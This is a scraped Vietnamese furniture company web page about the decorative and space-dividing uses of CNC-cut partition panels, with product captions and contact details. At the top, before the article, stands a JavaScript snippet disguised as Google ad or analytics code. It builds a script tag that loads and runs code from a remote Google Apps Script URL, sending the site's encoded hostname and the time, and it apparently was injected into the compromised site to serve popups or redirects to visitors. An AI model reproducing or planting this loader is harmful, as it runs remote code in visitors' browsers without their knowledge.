var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

2 ứng dụng không thể bỏ qua của vách ngăn CNC

1. Phân chia, ngăn cách không gian một cách ước lệ, tượng trưng

Đã gọi là vách ngăn thì hẳn chức năng hàng đầu của sản phẩm này sẽ là ngăn cách không gian. Tuy nhiên sự ngăn cách này chỉ là về mặt thị giác, mang tính ước lệ tượng trưng, tạo ra ranh giới giữa các khu vực chức năng trong một không gian rộng. Người ta thường dùng vách ngăn CNC ngăn giữa khu vực phòng khách với sảnh, giữa khu vực tiếp khách với bàn ăn,…

Phân chia không gian bằng vách ngăn CNC vừa tạo ra ra ranh giới rõ ràng, vừa không làm mất đi tính liên thông, liên kết giữa các khu vực liền kề, cũng không khiến không gian bị chia quá vụn và trở nên chật hẹp.

 

 Vách ngăn CNC mã CNC12

Vách ngăn duyên dáng giữa phòng khách và hành lang


 

Vách ngăn CNC mã CNC10

  Không cần thanh vịn cầu thang nữa vì bạn đã có vách ngăn CNC

2. Trang trí

Với ưu điểm là hoa văn, họa tiết đa dạng theo ý muốn của khách hàng, vách ngăn CNC còn được sử dụng rất nhiều để trang trí cho các căn phòng, các mảng tường. Vách CNC sẽ làm mềm những không gian vốn đang tẻ nhạt, khô khan. Hãy thử hình dung một căn phòng vốn chỉ có những bức tường thì sẽ thật buồn bã, nhưng chỉ cần thay thế một mảng tường bằng vách CNC, căn phòng bên trong sẽ lập tức trở nên ẩn hiện, hấp dẫn hơn với những người đứng bên ngoài. Vách CNC cũng là một điểm nhấn lạ mắt trên bức tường đầu giường ngủ của bạn. 
  

 

Vách ngăn CNC mã CNC04

Vách CNC thay thế cho một mảng tường, họa tiết hình rẻ quạt sẽ làm mềm mại mọi bức tường khô cứng

 

 

Vách ngăn CNC mã CNC06 

Sức hút của phòng ngủ này chính là hai tấm vách CNC với hoa văn truyền thống 


Nếu bạn đang băn khoăn về bất cứ thông tin chi tiết nào, cần hỗ trợ thiết kế tư vấn nội thất đẹp cho gia đình. Hãy liên hệ với Nội Thất Xinh chúng tôi để được giải đáp từ đội ngũ kiến trúc sư dày dặn kinh nghiệm, chuyên nghiệp và tận tình.

NỘI THẤT XINH – Tiện nghi cuộc sống

Tư vấn sản phẩm nội thất : 0914.11.8383 / 0975.90.3333 

Showroom: Số 321 Trường Chinh – Thanh Xuân – Hà Nội – Tel: 043.905.9999